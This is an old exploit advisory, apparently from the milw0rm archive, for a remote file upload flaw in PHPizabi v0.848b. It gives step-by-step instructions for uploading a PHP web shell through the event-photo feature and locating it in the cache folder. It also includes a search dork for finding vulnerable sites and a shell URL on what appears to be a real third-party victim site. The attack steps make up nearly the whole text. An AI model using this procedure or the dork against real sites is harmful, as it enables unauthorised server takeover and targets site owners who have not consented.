############################################ Powered by PHPizabi v0.848b C1 HFP1 remote file upload author: ZoRLu home: www.yildirimordulari.org contact: trt-turk@hotmail.com dork: "Powered by PHPizabi v0.848b C1 HFP1" ############################################ exploit: http://localhost/izabi/system/cache/pictures/id_shell.php -first register web site -Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create ) -event title and description write. show to select All the users. gözat button click and shell.php upload -after go to event page. upload photo right click. open the menu click to properties. copy the url example: http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500 and exploit: http://localhost/izabi/system/cache/pictures/xxx_shell.php example web site: http://bitchinindie.com/system/image.php?file=597_shell.php&width=500 exploit shell.php http://bitchinindie.com/system/cache/pictures/597_shell.php ################################################## thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter and all users yildirimordulari.org siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :))) ## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ## ################################################# # milw0rm.com [2008-02-17]